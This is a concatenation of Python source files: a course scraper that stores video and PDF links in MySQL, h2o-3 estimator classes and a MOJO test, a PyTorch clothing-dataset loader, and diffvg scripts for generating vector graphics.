file.write('%s \n' % (single_chaper[1]))
# 这里id为二级目录id
lesson_pattern_compile = re.compile(
r'chapterId=' + single_chaper[0] +
r'.*?contentType=1.*?id=(\d+).+name="(.*?)".*?test')
# 查找所有二级目录id和name
lesson_set = re.findall(lesson_pattern_compile,
source_info_transcoding)
# 遍历所有二级目录id和name并写入目录
for sub_index, single_lesson in enumerate(lesson_set):
file.write(' %s \n' % (single_lesson[1]))
# 查找二级目录下视频,并返回 [contentid,contenttype,id,name]
video_pattern_compile = re.compile(
r'contentId=(\d+).+contentType=(1).*?id=(\d+).*?lessonId='
+ single_lesson[0] + r'.*?name="(.+)"')
video_set = re.findall(video_pattern_compile,
source_info_transcoding)
# 查找二级目录下文档,并返回 [contentid,contenttype,id,name]
pdf_pattern_compile = re.compile(
r'contentId=(\d+).+contentType=(3).+id=(\d+).+lessonId=' +
single_lesson[0] + r'.+name="(.+)"')
pdf_set = re.findall(pdf_pattern_compile,
source_info_transcoding)
name_pattern_compile = re.compile(
r'^[第一二三四五六七八九十\d]+[\s\d\._章课节讲]*[\.\s、]\s*\d*')
# 遍历二级目录下视频集合,写入目录并下载
count_num = 0
for video_index, single_video in enumerate(video_set):
rename = re.sub(name_pattern_compile, '', single_video[3])
file.write(' [视频] %s \n' % (rename))
get_content(
course_id,
single_video, '%d.%d.%d [视频] %s' %
(index + 1, sub_index + 1, video_index + 1, rename),
video_level)
count_num += 1
# 遍历二级目录下pdf集合,写入目录并下载
for pdf_index, single_pdf in enumerate(pdf_set):
rename = re.sub(name_pattern_compile, '', single_pdf[3])
file.write(' [文档] %s \n' % (rename))
get_content(
course_id,
single_pdf, '%d.%d.%d [文档] %s' %
(index + 1, sub_index + 1, pdf_index + 1 + count_num,
rename))
def get_content(course_id, single_content, name, *args):
conn = pymysql.connect(host='127.0.0.1', port=3306, db='graduate',
user='root', password='<PASSWORD>')
cusor = conn.cursor()
course = Course()
# 定义插入sql
# 插入资源
sql1 = "insert into resource (course_id,resource_type,resource_name) value (%s,%s,%s)"
# 插入视频
sql2 = "insert into pdf (resource_id,pdf_url) value (%s,%s)"
# 插入文档
sql3 = "insert into mp4 (resource_id,mp4_url) value (%s,%s)"
# 定义下载地址
url2 = ''
'''
如果是文档,则直接下载
如果是视频,则保存链接供第三方下载
'''
# 检查文件命名,防止网站资源有特殊字符本地无法保存
file_pattern_compile = re.compile(r'[\\/:\*\?"<>\|]')
name = re.sub(file_pattern_compile, '', name)
# 检查是否有重名的(即已经下载过的)
if os.path.exists('PDFs\\' + name + '.pdf'):
print(name + "------------->已下载")
return
post_data = {
'callCount': '1',
'scriptSessionId': '${scriptSessionId}190',
'httpSessionId': '5531d06316b34b9486a6891710115ebc',
'c0-scriptName': 'CourseBean',
'c0-methodName': 'getLessonUnitLearnVo',
'c0-id': '0',
'c0-param0': 'number:' + single_content[0], # 二级目录id
'c0-param1': 'number:' + single_content[1], # 判定文件还是视频
'c0-param2': 'number:0',
'c0-param3': 'number:' + single_content[2], # 具体资源id
'batchId': '1492168138043'
}
sources = requests.post(
SOURCE_RESOURCE_URL, headers=HEADER, data=post_data).text
# 如果是视频的话
if single_content[1] == '1':
try:
if args[0] == 'a':
download_pattern_compile = re.compile(
r'mp4SdUrl="(.*?\.mp4).*?"')
elif args[0] == "b":
download_pattern_compile = re.compile(
r'mp4HdUrl="(.*?\.mp4).*?"')
else:
download_pattern_compile = re.compile(
r'mp4ShdUrl="(.*?\.mp4).*?"')
video_down_url = re.search(download_pattern_compile,
sources).group(1)
except AttributeError:
# print('------------------------')
# print(name + '没有该清晰度格式,降级处理')
# print('------------------------')
# download_pattern_compile = re.compile(r'mp4SdUrl="(.*?\.mp4).*?"')
# video_down_url = re.search(download_pattern_compile,
# sources).group(1)
# 如果发生异常,跳过
return
print('正在存储链接:' + name + '.mp4')
with open('Links.txt', 'a', encoding='utf-8') as file:
file.write('%s \n' % (video_down_url))
url2 = video_down_url
with open('Rename.bat', 'a', encoding='utf-8') as file:
video_down_url = re.sub(r'/', '_', video_down_url)
# file.write('rename "' + re.search(
# r'http:.*video_(.*.mp4)', video_down_url).group(1) + '" "' +
# name + '.mp4"' + '\n')
file.write(name + '\n')
# 先插入resource
cusor.execute(sql1, (course_id, 'mp4', name))
# 获取主键id,再插入mp4
cusor.execute(sql3, (conn.insert_id(), url2))
conn.commit()
# 如果是文档的话
else:
pdf_download_url = re.search(r'textOrigUrl:"(.*?)"', sources).group(1)
print('正在下载:' + name + '.pdf')
pdf_file = requests.get(pdf_download_url, headers=HEADER)
if not os.path.isdir('PDFs'):
os.mkdir(r'PDFs')
with open('PDFLinks.txt', 'a', encoding='utf-8') as file:
file.write('%s \n' % (pdf_download_url))
with open('PDFName.txt', 'a', encoding='utf-8') as file:
file.write('%s \n' % (name))
# with open('PDFs\\' + name + '.pdf', 'wb') as file:
# file.write(pdf_file.content)
# 插入文档表
# 先插入resource
cusor.execute(sql1, (course_id, 'pdf', name))
# 获取主键id,再插入mp4
cusor.execute(sql2, (conn.insert_id(), pdf_download_url))
conn.commit()
cusor.close()
conn.close()
def select_video_level():
# '''
# 选择视频质量
# '''
# print('\n')
# print('------------------------')
# print("| 请选择视频质量: |")
# print("| |")
# print("|(a)标清 (b)高清 (c)超清 |")
# print("| |")
# print('------------------------')
# video_level = input('请选择(a或b或c)')
# level = {'a': "标清", 'b': '高清', 'c': "超清"}
# print('\n')
# print('------------------------')
# print('视频将下载为【' + level.get(video_level) + '】')
# print('------------------------')
# print('\n')
return 'a'
def check_select_course(course):
# '''
# 提供用户监测输入的课程编号是否正确
# '''
# print("\n")
# print('------------------------')
# print('您选择的是:')
# print(course.course_title + '\n' + course.course_collage)
# print('------------------------')
# return input('请确认输入(y/n):')
return 'y'
def main():
conn = pymysql.connect(host='127.0.0.1', port=3306, db='graduate',
user='root', password='<PASSWORD>')
cusor = conn.cursor()
course = Course()
# 因为Links文件夹为追加模式打开,所以需要事先删除
if os.path.exists('Links.txt'):
os.remove('Links.txt')
if os.path.exists('PDFLinks.txt'):
os.remove('PDFLinks.txt')
if os.path.exists('PDFName.txt'):
os.remove('PDFName.txt')
# 同样是追加模式,首先删除原来的,然后确定新的编码格式
if os.path.exists("Rename.bat"):
os.remove("Rename.bat")
with open('Rename.bat', 'a', encoding='utf-8') as file:
file.writelines('chcp 65001\n')
# 查询课程id
sql = "select course_id from mooc "
cusor.execute(sql)
acourseid = cusor.fetchall()
bcourseid = []
# 将查处的元祖中的元祖列表转为字符串数组
for a in acourseid:
bcourseid.append(a[0])
# print(bcourseid)
# for i in courseid:
# print(i)
conn.commit()
# cusor.close()
# conn.close()
# while True:
# course.set_course(input("\n请输入课程id(例如SICNU-1002031014)"))
# 进行遍历存储
sql4 = 'update mooc set course_id=%s where course_id=%s'
# for i in bcourseid:
# try:
# course.set_course(i)
# course.get_course_info()
# # if check_select_course(course) == 'y':
# # break
# #更改mooc course_id名
# print(i)
# print(course.course_id)
# cusor.execute(sql4,[course.course_id,i])
# conn.commit()
# #获取资源
# # get_course_all_source(course.course_id)
# except BaseException:
# continue
course_id = 'SWJTU - 1001911007'
course.set_course(course_id)
course.get_course_info()
cusor.execute(sql4, [course.course_id, course_id])
conn.commit()
# print(bcourseid[0])
# get_course_all_source(bcourseid[0])
cusor.close()
conn.close()
if __name__ == '__main__':
main()
``` |
{
"source": "13927729580/h2o-3",
"score": 3
} |
#### File: custom/python/gen_generic.py
```python
def class_extensions():
def _requires_training_frame(self):
"""
Determines if Generic model requires a training frame.
:return: False.
"""
return False
@staticmethod
def from_file(file=str):
"""
Creates new Generic model by loading existing embedded model into library, e.g. from H2O MOJO.
The imported model must be supported by H2O.
:param file: A string containing path to the file to create the model from
:return: H2OGenericEstimator instance representing the generic model
"""
model = H2OGenericEstimator(path = file)
model.train()
return model
extensions = dict(
__init__validation="""
if all(kwargs.get(name, None) is None for name in ["model_key", "path"]):
raise H2OValueError('At least one of ["model_key", "path"] is required.')
""",
__class__=class_extensions,
)
```
#### File: custom/python/gen_svd.py
```python
rest_api_version = 99
def class_extensions():
def init_for_pipeline(self):
"""
Returns H2OSVD object which implements fit and transform method to be used in sklearn.Pipeline properly.
All parameters defined in self.__params, should be input parameters in H2OSVD.__init__ method.
:returns: H2OSVD object
"""
import inspect
from h2o.transforms.decomposition import H2OSVD
# check which parameters can be passed to H2OSVD init
var_names = list(dict(inspect.getmembers(H2OSVD.__init__.__code__))['co_varnames'])
parameters = {k: v for k, v in self._parms.items() if k in var_names}
return H2OSVD(**parameters)
extensions = dict(
__class__=class_extensions,
)
```
#### File: h2o/estimators/isolation_forest.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
from h2o.estimators.estimator_base import H2OEstimator
from h2o.exceptions import H2OValueError
from h2o.frame import H2OFrame
from h2o.utils.typechecks import assert_is_type, Enum, numeric
class H2OIsolationForestEstimator(H2OEstimator):
"""
Isolation Forest
Builds an Isolation Forest model. Isolation Forest algorithm samples the training frame
and in each iteration builds a tree that partitions the space of the sample observations until
it isolates each observation. Length of the path from root to a leaf node of the resulting tree
is used to calculate the anomaly score. Anomalies are easier to isolate and their average
tree path is expected to be shorter than paths of regular observations.
"""
algo = "isolationforest"
param_names = {"model_id", "training_frame", "score_each_iteration", "score_tree_interval", "ignored_columns",
"ignore_const_cols", "ntrees", "max_depth", "min_rows", "max_runtime_secs", "seed",
"build_tree_one_node", "mtries", "sample_size", "sample_rate", "col_sample_rate_change_per_level",
"col_sample_rate_per_tree", "categorical_encoding", "stopping_rounds", "stopping_metric",
"stopping_tolerance", "export_checkpoints_dir"}
def __init__(self, **kwargs):
super(H2OIsolationForestEstimator, self).__init__()
self._parms = {}
for pname, pvalue in kwargs.items():
if pname == 'model_id':
self._id = pvalue
self._parms["model_id"] = pvalue
elif pname in self.param_names:
# Using setattr(...) will invoke type-checking of the arguments
setattr(self, pname, pvalue)
else:
raise H2OValueError("Unknown parameter %s = %r" % (pname, pvalue))
@property
def training_frame(self):
"""
Id of the training data frame.
Type: ``H2OFrame``.
"""
return self._parms.get("training_frame")
@training_frame.setter
def training_frame(self, training_frame):
self._parms["training_frame"] = H2OFrame._validate(training_frame, 'training_frame')
@property
def score_each_iteration(self):
"""
Whether to score during each iteration of model training.
Type: ``bool`` (default: ``False``).
"""
return self._parms.get("score_each_iteration")
@score_each_iteration.setter
def score_each_iteration(self, score_each_iteration):
assert_is_type(score_each_iteration, None, bool)
self._parms["score_each_iteration"] = score_each_iteration
@property
def score_tree_interval(self):
"""
Score the model after every so many trees. Disabled if set to 0.
Type: ``int`` (default: ``0``).
"""
return self._parms.get("score_tree_interval")
@score_tree_interval.setter
def score_tree_interval(self, score_tree_interval):
assert_is_type(score_tree_interval, None, int)
self._parms["score_tree_interval"] = score_tree_interval
@property
def ignored_columns(self):
"""
Names of columns to ignore for training.
Type: ``List[str]``.
"""
return self._parms.get("ignored_columns")
@ignored_columns.setter
def ignored_columns(self, ignored_columns):
assert_is_type(ignored_columns, None, [str])
self._parms["ignored_columns"] = ignored_columns
@property
def ignore_const_cols(self):
"""
Ignore constant columns.
Type: ``bool`` (default: ``True``).
"""
return self._parms.get("ignore_const_cols")
@ignore_const_cols.setter
def ignore_const_cols(self, ignore_const_cols):
assert_is_type(ignore_const_cols, None, bool)
self._parms["ignore_const_cols"] = ignore_const_cols
@property
def ntrees(self):
"""
Number of trees.
Type: ``int`` (default: ``50``).
"""
return self._parms.get("ntrees")
@ntrees.setter
def ntrees(self, ntrees):
assert_is_type(ntrees, None, int)
self._parms["ntrees"] = ntrees
@property
def max_depth(self):
"""
Maximum tree depth.
Type: ``int`` (default: ``8``).
"""
return self._parms.get("max_depth")
@max_depth.setter
def max_depth(self, max_depth):
assert_is_type(max_depth, None, int)
self._parms["max_depth"] = max_depth
@property
def min_rows(self):
"""
Fewest allowed (weighted) observations in a leaf.
Type: ``float`` (default: ``1``).
"""
return self._parms.get("min_rows")
@min_rows.setter
def min_rows(self, min_rows):
assert_is_type(min_rows, None, numeric)
self._parms["min_rows"] = min_rows
@property
def max_runtime_secs(self):
"""
Maximum allowed runtime in seconds for model training. Use 0 to disable.
Type: ``float`` (default: ``0``).
"""
return self._parms.get("max_runtime_secs")
@max_runtime_secs.setter
def max_runtime_secs(self, max_runtime_secs):
assert_is_type(max_runtime_secs, None, numeric)
self._parms["max_runtime_secs"] = max_runtime_secs
@property
def seed(self):
"""
Seed for pseudo random number generator (if applicable)
Type: ``int`` (default: ``-1``).
"""
return self._parms.get("seed")
@seed.setter
def seed(self, seed):
assert_is_type(seed, None, int)
self._parms["seed"] = seed
@property
def build_tree_one_node(self):
"""
Run on one node only; no network overhead but fewer cpus used. Suitable for small datasets.
Type: ``bool`` (default: ``False``).
"""
return self._parms.get("build_tree_one_node")
@build_tree_one_node.setter
def build_tree_one_node(self, build_tree_one_node):
assert_is_type(build_tree_one_node, None, bool)
self._parms["build_tree_one_node"] = build_tree_one_node
@property
def mtries(self):
"""
Number of variables randomly sampled as candidates at each split. If set to -1, defaults (number of
predictors)/3.
Type: ``int`` (default: ``-1``).
"""
return self._parms.get("mtries")
@mtries.setter
def mtries(self, mtries):
assert_is_type(mtries, None, int)
self._parms["mtries"] = mtries
@property
def sample_size(self):
"""
Number of randomly sampled observations used to train each Isolation Forest tree. Only one of parameters
sample_size and sample_rate should be defined. If sample_rate is defined, sample_size will be ignored.
Type: ``int`` (default: ``256``).
"""
return self._parms.get("sample_size")
@sample_size.setter
def sample_size(self, sample_size):
assert_is_type(sample_size, None, int)
self._parms["sample_size"] = sample_size
@property
def sample_rate(self):
"""
Rate of randomly sampled observations used to train each Isolation Forest tree. Needs to be in range from 0.0 to
1.0. If set to -1, sample_rate is disabled and sample_size will be used instead.
Type: ``float`` (default: ``-1``).
"""
return self._parms.get("sample_rate")
@sample_rate.setter
def sample_rate(self, sample_rate):
assert_is_type(sample_rate, None, numeric)
self._parms["sample_rate"] = sample_rate
@property
def col_sample_rate_change_per_level(self):
"""
Relative change of the column sampling rate for every level (must be > 0.0 and <= 2.0)
Type: ``float`` (default: ``1``).
"""
return self._parms.get("col_sample_rate_change_per_level")
@col_sample_rate_change_per_level.setter
def col_sample_rate_change_per_level(self, col_sample_rate_change_per_level):
assert_is_type(col_sample_rate_change_per_level, None, numeric)
self._parms["col_sample_rate_change_per_level"] = col_sample_rate_change_per_level
@property
def col_sample_rate_per_tree(self):
"""
Column sample rate per tree (from 0.0 to 1.0)
Type: ``float`` (default: ``1``).
"""
return self._parms.get("col_sample_rate_per_tree")
@col_sample_rate_per_tree.setter
def col_sample_rate_per_tree(self, col_sample_rate_per_tree):
assert_is_type(col_sample_rate_per_tree, None, numeric)
self._parms["col_sample_rate_per_tree"] = col_sample_rate_per_tree
@property
def categorical_encoding(self):
"""
Encoding scheme for categorical features
One of: ``"auto"``, ``"enum"``, ``"one_hot_internal"``, ``"one_hot_explicit"``, ``"binary"``, ``"eigen"``,
``"label_encoder"``, ``"sort_by_response"``, ``"enum_limited"`` (default: ``"auto"``).
"""
return self._parms.get("categorical_encoding")
@categorical_encoding.setter
def categorical_encoding(self, categorical_encoding):
assert_is_type(categorical_encoding, None, Enum("auto", "enum", "one_hot_internal", "one_hot_explicit", "binary", "eigen", "label_encoder", "sort_by_response", "enum_limited"))
self._parms["categorical_encoding"] = categorical_encoding
@property
def stopping_rounds(self):
"""
Early stopping based on convergence of stopping_metric. Stop if simple moving average of length k of the
stopping_metric does not improve for k:=stopping_rounds scoring events (0 to disable)
Type: ``int`` (default: ``0``).
"""
return self._parms.get("stopping_rounds")
@stopping_rounds.setter
def stopping_rounds(self, stopping_rounds):
assert_is_type(stopping_rounds, None, int)
self._parms["stopping_rounds"] = stopping_rounds
@property
def stopping_metric(self):
"""
Metric to use for early stopping (AUTO: logloss for classification, deviance for regression and anonomaly_score
for Isolation Forest). Note that custom and custom_increasing can only be used in GBM and DRF with the Python
client.
One of: ``"auto"``, ``"anomaly_score"`` (default: ``"auto"``).
"""
return self._parms.get("stopping_metric")
@stopping_metric.setter
def stopping_metric(self, stopping_metric):
assert_is_type(stopping_metric, None, Enum("auto", "anomaly_score"))
self._parms["stopping_metric"] = stopping_metric
@property
def stopping_tolerance(self):
"""
Relative tolerance for metric-based stopping criterion (stop if relative improvement is not at least this much)
Type: ``float`` (default: ``0.01``).
"""
return self._parms.get("stopping_tolerance")
@stopping_tolerance.setter
def stopping_tolerance(self, stopping_tolerance):
assert_is_type(stopping_tolerance, None, numeric)
self._parms["stopping_tolerance"] = stopping_tolerance
@property
def export_checkpoints_dir(self):
"""
Automatically export generated models to this directory.
Type: ``str``.
"""
return self._parms.get("export_checkpoints_dir")
@export_checkpoints_dir.setter
def export_checkpoints_dir(self, export_checkpoints_dir):
assert_is_type(export_checkpoints_dir, None, str)
self._parms["export_checkpoints_dir"] = export_checkpoints_dir
```
#### File: tests/testdir_generic_model/pyunit_generic_model_mojo_drf.py
```python
import h2o
import tempfile
import os
from h2o.estimators import H2ORandomForestEstimator, H2OGenericEstimator
from tests import pyunit_utils
from tests.testdir_generic_model import compare_output, Capturing
def test(x, y, output_test, strip_part, algo_name, generic_algo_name):
airlines = h2o.import_file(path=pyunit_utils.locate("smalldata/testng/airlines_train.csv"))
drf = H2ORandomForestEstimator(ntrees=1, nfolds = 3)
drf.train(x = x, y = y, training_frame=airlines, validation_frame=airlines)
print(drf)
with Capturing() as original_output:
drf.show()
original_model_filename = tempfile.mkdtemp()
original_model_filename = drf.download_mojo(original_model_filename)
model = H2OGenericEstimator.from_file(original_model_filename)
assert model is not None
print(model)
with Capturing() as generic_output:
model.show()
output_test(str(original_output), str(generic_output), strip_part, algo_name, generic_algo_name)
predictions = model.predict(airlines)
assert predictions is not None
assert predictions.nrows == 24421
assert model._model_json["output"]["variable_importances"] is not None
assert len(model._model_json["output"]["variable_importances"]._cell_values) > 0
assert model._model_json["output"]["model_summary"] is not None
assert len(model._model_json["output"]["model_summary"]._cell_values) > 0
generic_mojo_filename = tempfile.mkdtemp("zip", "genericMojo");
generic_mojo_filename = model.download_mojo(path=generic_mojo_filename)
assert os.path.getsize(generic_mojo_filename) == os.path.getsize(original_model_filename)
def mojo_model_test_regression():
test(["Origin", "Dest"], "Distance", compare_output, "'Model Summary: '", 'ModelMetricsRegression: drf',
'ModelMetricsRegressionGeneric: generic')
def mojo_model_test_binomial():
test(["Origin", "Dest"], "IsDepDelayed", compare_output, "'Model Summary: '", 'ModelMetricsBinomial: drf',
'ModelMetricsBinomialGeneric: generic')
def mojo_model_test_multinomial():
test(["Origin", "Distance"], "Dest", compare_output, "'Model Summary: '", 'ModelMetricsMultinomial: drf',
'ModelMetricsMultinomialGeneric: generic')
if __name__ == "__main__":
pyunit_utils.standalone_test(mojo_model_test_binomial)
pyunit_utils.standalone_test(mojo_model_test_multinomial)
pyunit_utils.standalone_test(mojo_model_test_regression)
else:
mojo_model_test_multinomial()
mojo_model_test_binomial()
mojo_model_test_regression()
``` |
{
"source": "13952522076/DeepMetric",
"score": 3
} |
#### File: DeepMetric/DataSet/In_shop_clothes.py
```python
from __future__ import absolute_import, print_function
"""
In-shop-clothes data-set for Pytorch
"""
import torch
import torch.utils.data as data
from PIL import Image
import os
from torchvision import transforms
from collections import defaultdict
from DataSet.CUB200 import default_loader, Generate_transform_Dict
class MyData(data.Dataset):
def __init__(self, root=None, label_txt=None,
transform=None, loader=default_loader):
# Initialization data path and train(gallery or query) txt path
if root is None:
root = "data/InShopClothes"
label_txt = os.path.join(root, 'train.txt')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
if transform is None:
transform = transforms.Compose([
# transforms.CovertBGR(),
transforms.Resize(256),
transforms.RandomResizedCrop(scale=(0.16, 1), size=224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
# read txt get image path and labels
file = open(label_txt)
images_anon = file.readlines()
images = []
labels = []
for img_anon in images_anon:
img_anon = img_anon.replace(' ', '\t')
[img, label] = (img_anon.split('\t'))[:2]
images.append(img)
labels.append(int(label))
classes = list(set(labels))
# Generate Index Dictionary for every class
Index = defaultdict(list)
for i, label in enumerate(labels):
Index[label].append(i)
# Initialization Done
self.root = root
self.images = images
self.labels = labels
self.classes = classes
self.transform = transform
self.Index = Index
self.loader = loader
def __getitem__(self, index):
fn, label = self.images[index], self.labels[index]
# print(os.path.join(self.root, fn))
img = self.loader(os.path.join(self.root, fn))
if self.transform is not None:
img = self.transform(img)
return img, label
def __len__(self):
return len(self.images)
class InShopClothes:
def __init__(self, root=None, crop=False, origin_width=256, width=224, ratio=0.16):
# Data loading code
transform_Dict = Generate_transform_Dict(origin_width=origin_width, width=width, ratio=ratio)
if root is None:
root = 'data/In_shop_clothes'
train_txt = os.path.join(root, 'train.txt')
gallery_txt = os.path.join(root, 'gallery.txt')
query_txt = os.path.join(root, 'query.txt')
self.train = MyData(root, label_txt=train_txt, transform=transform_Dict['rand-crop'])
self.gallery = MyData(root, label_txt=gallery_txt, transform=transform_Dict['center-crop'])
self.query = MyData(root, label_txt=query_txt, transform=transform_Dict['center-crop'])
def testIn_Shop_Clothes():
data = InShopClothes()
print(len(data.gallery), len(data.train))
print(len(data.query))
print(data.train[1][0][0][0][1])
if __name__ == "__main__":
testIn_Shop_Clothes()
``` |
{
"source": "13952522076/diffvg",
"score": 2
} |
#### File: pair/generate/dataset.py
```python
import os
import pickle
import glob
import numpy as np
from torch.utils.data import Dataset
from typing import Any, Callable, Optional, Tuple
def load_data(root="../data/generate/generate/row_data/train", normalize=True):
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# DATA_DIR = os.path.join(BASE_DIR, 'data')
all_loss = []
all_segnum = []
all_color = []
color_map= {"RadialGradient":2, "LinearGradient":1, "Normal":0}
for file_name in glob.glob(os.path.join(BASE_DIR, root, '*.pkl')):
with open(file_name, "rb") as f:
row_list = pickle.load(f)
for row in row_list:
data = row["pixelwise_loss"].astype('float32')
if normalize:
data = (data-data.mean())/(data.std() + 1e-8) # mean/std normalize
data -= data.min()
data /= (data.max() + 1e-8) # scale to [0, 1]
all_loss.append(data)
all_segnum.append(row["best_num_segments"]-3) # minus 3 because it starts from 3
all_color.append(color_map[row["best_color"]])
all_loss = np.concatenate(all_loss, axis=0)
all_segnum = np.concatenate([all_segnum], axis=0)
all_color = np.concatenate([all_color], axis=0)
return all_loss, all_segnum, all_color
class LossDataset(Dataset):
def __init__(self, root="../data/generate/generate/row_data/train", normalize=True, transform: Optional[Callable] = None):
self.data, self.segnum, self.color = load_data(root, normalize)
self.transform = transform
def __getitem__(self, item):
data = self.data[item]
data = data.transpose(1, 2, 0)
segnum = self.segnum[item]
color = self.color[item]
if self.transform is not None:
data = self.transform(data)
return data, segnum, color
def __len__(self):
return self.data.shape[0]
if __name__ == "__main__":
import torchvision.transforms as transforms
load_data()
transform_train = transforms.Compose([ transforms.ToPILImage(),
transforms.Resize(224), transforms.RandomHorizontalFlip(), transforms.ToTensor()])
dataset = LossDataset(transform=transform_train)
Seg3_num = 0
Seg4_num = 0
Seg5_num = 0
Seg6_num = 0
Seg7_num = 0
Seg8_num = 0
Norm_num = 0
Linear_num = 0
Radial_num = 0
for i in range(0, len(dataset.segnum)):
if dataset.segnum[i] ==0:
Seg3_num +=1
if dataset.segnum[i] ==1:
Seg4_num +=1
if dataset.segnum[i] ==2:
Seg5_num +=1
if dataset.segnum[i] ==3:
Seg6_num +=1
if dataset.segnum[i] ==4:
Seg7_num +=1
if dataset.segnum[i] ==5:
Seg8_num +=1
if dataset.color[i] ==0:
Radial_num +=1
if dataset.color[i] ==1:
Linear_num +=1
if dataset.color[i] ==2:
Norm_num +=1
print(f"Seg3: {Seg3_num} Seg4: {Seg4_num} Seg5: {Seg5_num} Seg6: {Seg6_num} Seg7: {Seg7_num} Seg8: {Seg8_num}")
print(f"Radial_num: {Radial_num} Linear_num: {Linear_num} Norm_num: {Norm_num}")
# print(dataset.__len__())
# print(dataset.__getitem__(28))
for i in range (1,500):
t = np.random.randint(0,300)
data, segnum, color = dataset.__getitem__(t)
# print(data.max(), data.min(), segnum, color)
print(data.mean())
```
#### File: pair/generate/generate_template.py
```python
import pydiffvg
import torch
import os
import numpy as np
import cv2
import skimage
import skimage.io
import matplotlib.pyplot as plt
import random
import argparse
import math
import errno
from tqdm import tqdm
from torch.optim.lr_scheduler import CosineAnnealingLR
from torch.nn.functional import adaptive_avg_pool2d
import warnings
warnings.filterwarnings("ignore")
pydiffvg.set_print_timing(False)
gamma = 1.0
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--template_path", type=str, default="../data/generate/template")
parser.add_argument("--generate_path", type=str, default="../data/generate/generate")
parser.add_argument("--path_num_min", type=int, default=1)
parser.add_argument("--path_num_max", type=int, default=8)
parser.add_argument("--generate_num", type=int, default=2000)
return parser.parse_args()
def main():
args = parse_args()
shapes_list = []
shape_groups_list = []
try:
os.makedirs(os.path.join(args.generate_path,'img'))
except OSError as exc: # Python >2.5
pass
try:
os.makedirs(os.path.join(args.generate_path,'svg'))
except OSError as exc: # Python >2.5
pass
for root, dirs, files in os.walk(args.template_path):
for file in files:
if file.endswith(".svg"):
file_path = os.path.join(root, file)
canvas_width, canvas_height, shapes, shape_groups = pydiffvg.svg_to_scene(file_path)
canvas_width, canvas_height = 240, 240
shapes_list.extend(shapes)
shape_groups_list.extend(shape_groups)
shapes_num = len(shapes_list)
print(f"length of shapes_list is {len(shapes_list)}")
for t in tqdm(range(args.generate_num)):
path_num = np.random.randint(args.path_num_min, args.path_num_max+1) # [path_num_min, path_num_max]
path_indexes = np.random.randint(0, shapes_num, size=path_num).tolist()
selected_shapes = []
selected_shape_groups = []
shape_groups = []
shapes = []
for i in path_indexes:
selected_shape = shapes_list[i]
selected_shape_group = shape_groups_list[i]
new_path = pydiffvg.Path(num_control_points = selected_shape.num_control_points,
points = selected_shape.points,
stroke_width = torch.tensor(1.0),
is_closed = True)
points = new_path.points
# points = points + 1*(torch.rand_like(points)-0.5)
# if np.random.randint(1,3) ==1: # random shift the position
# mean_point = new_path.points.mean(dim=1, keepdim=True)
# points = points - mean_point + torch.rand_like(mean_point)*1.1*mean_point
# if np.random.randint(1,3) ==1: # random add some disturbance
# points = points * (1+ (0.02*(torch.rand_like(points)-0.5))) # [0.85-1.05]
new_path.points = points
shapes.append(new_path)
# process color
color = selected_shape_group.fill_color
if isinstance(selected_shape_group.fill_color, pydiffvg.RadialGradient):
print(f"{t} includes RadialGradient")
color.center = torch.rand_like(color.center)*(torch.tensor([canvas_width, canvas_height]).to(color.center.device))
color.radius = torch.rand_like(color.radius)*(torch.tensor([canvas_width, canvas_height]).to(color.radius.device))
# color.center = color.center * (0.1*(torch.rand_like(color.center)-0.5)+1.0)
# color.radius = color.radius * (0.1*(torch.rand_like(color.radius)-0.5)+1.0)
color.stop_colors = torch.rand_like(color.stop_colors)*1.3-0.1
color.stop_colors[:,3] = 1.0 # make most are 1.0
color.stop_colors.data.clamp_(0.0, 1.0)
elif isinstance(selected_shape_group.fill_color, pydiffvg.LinearGradient):
print(f"{t} includes LinearGradient")
color.begin = torch.rand_like(color.begin)*(torch.tensor([canvas_width, canvas_height]).to(color.begin.device))
color.end = torch.rand_like(color.end)*(torch.tensor([canvas_width, canvas_height]).to(color.end.device))
color.begin[0] = min(color.begin[0],color.end[0] )
color.begin[1] = min(color.begin[1],color.end[1] )
color.end[0] = max(color.begin[0],color.end[0] )
color.end[1] = max(color.begin[1],color.end[1] )
# color.begin = color.begin * (0.1*(torch.rand_like(color.begin)-0.5)+1.0)
# color.end = color.end * (0.1*(torch.rand_like(color.end)-0.5)+1.0)
color.stop_colors = torch.rand_like(color.stop_colors)*1.3-0.1
color.stop_colors[:,3] = 1.0 # make most are 1.0
color.stop_colors.data.clamp_(0.0, 1.0)
else:
color = torch.rand_like(color)*1.3-0.1
color[3] = 1.0 # make most are 1.0
color.data.clamp_(0.0, 1.0)
new_path_group = pydiffvg.ShapeGroup(shape_ids = torch.tensor([len(shapes) - 1]),
fill_color = color)
shape_groups.append(new_path_group)
scene_args = pydiffvg.RenderFunction.serialize_scene(canvas_width, canvas_height, shapes, shape_groups)
render = pydiffvg.RenderFunction.apply
img = render(canvas_width, canvas_height, 2, 2, 0, None, *scene_args)
if np.random.randint(1,3) ==1: # random add background
# Compose img with white background
img = img[:, :, 3:4] * img[:, :, :3] + torch.ones(img.shape[0], img.shape[1], 3, device = pydiffvg.get_device()) * (1 - img[:, :, 3:4])
pydiffvg.save_svg(os.path.join(args.generate_path, "svg", str(t)+'.svg'),
canvas_width, canvas_height, shapes, shape_groups)
else:
bg = torch.rand(1, 1, 3, device = pydiffvg.get_device())
img = img[:, :, 3:4] * img[:, :, :3] + bg * (1 - img[:, :, 3:4])
c1,c2,c3, a0=int(bg[0,0,0]*255), int(bg[0,0,1]*255),int(bg[0,0,2]*255), 1
pydiffvg.save_svg(os.path.join(args.generate_path, "svg", str(t)+'.svg'),
canvas_width, canvas_height, shapes, shape_groups,
background=f"background: rgba({c1}, {c2}, {c3}, {a0})")
pydiffvg.imwrite(img.cpu(), os.path.join(args.generate_path, "img", str(t)+'.png'), gamma=gamma)
if __name__ == "__main__":
main()
```
#### File: pair/Layerwise/check_init_points.py
```python
import pydiffvg
import torch
import os
import matplotlib.pyplot as plt
import random
import argparse
import math
import errno
from tqdm import tqdm
from torch.optim.lr_scheduler import CosineAnnealingLR
from torch.nn.functional import adaptive_avg_pool2d
pydiffvg.set_print_timing(False)
gamma = 1.0
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("target", help="target image path")
parser.add_argument("--num_paths", type=str, default="1,1,1")
parser.add_argument("--num_segments", type=int, default=4)
parser.add_argument("--num_iter", type=int, default=500)
